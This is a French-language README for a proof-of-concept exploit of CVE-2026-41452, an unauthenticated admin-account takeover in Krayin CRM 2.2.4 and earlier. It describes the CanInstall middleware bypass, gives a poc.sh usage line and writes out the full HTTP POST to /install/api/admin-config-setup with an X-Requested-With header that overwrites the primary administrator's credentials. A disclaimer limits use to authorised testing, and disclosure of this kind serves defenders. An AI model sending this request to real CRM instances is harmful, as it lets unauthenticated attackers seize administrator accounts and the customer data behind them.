
Proof-of-concept d'exploit pour CVE-2026-41452, un contournement d'authentification critique dans Krayin CRM <= 2.2.4 permettant une prise de contrôle de compte administrateur sans authentification via un contournement de middleware.
Une preuve de concept (PoC) démontrant une vulnérabilité critique d'authentification manquante (CVE-2026-41452) affectant Krayin CRM version 2.2.4 et antérieures.
Cette faille permet à des attaquants distants non authentifiés de contourner la logique du middleware d'installation de l'application (CanInstall) en injectant des en-têtes HTTP spécifiques, entraînant un écrasement complet de la configuration du compte administrateur principal.
[!WARNING]
Avertissement : Ce dépôt et les informations qu'il contient sont fournis strictement à des fins éducatives, de recherche en sécurité et d'audit défensif autorisé. Les tests ou l'exploitation non autorisés de systèmes informatiques sont strictement illégaux. L'auteur décline toute responsabilité en cas de mauvaise utilisation de ce matériel.
ID CVE : CVE-2026-41452
Type de vulnérabilité : Authentification manquante / Contournement de middleware
Gravité : Critique (CVSS 9.8)
Logiciel affecté : Krayin CRM <= 2.2.4
Version corrigée : Krayin CRM >= 2.2.5
La vulnérabilité réside dans le middleware de configuration de l'application. Un attaquant non authentifié peut ajouter un en-tête X-Requested-With: XMLHttpRequest à une charge utile conçue pour cibler le point de terminaison /install/api/admin-config-setup. Cela supprime la vérification de redirection attendue au sein du middleware CanInstall, exposant une opération de base de données updateOrInsert non authentifiée qui cible l'ID codé en dur (1) de l'administrateur système principal.
Exécutez le script contre une instance cible que vous êtes autorisé à tester :
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
En interne, le contournement se déclenche via la structure de transaction HTTP suivante :
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123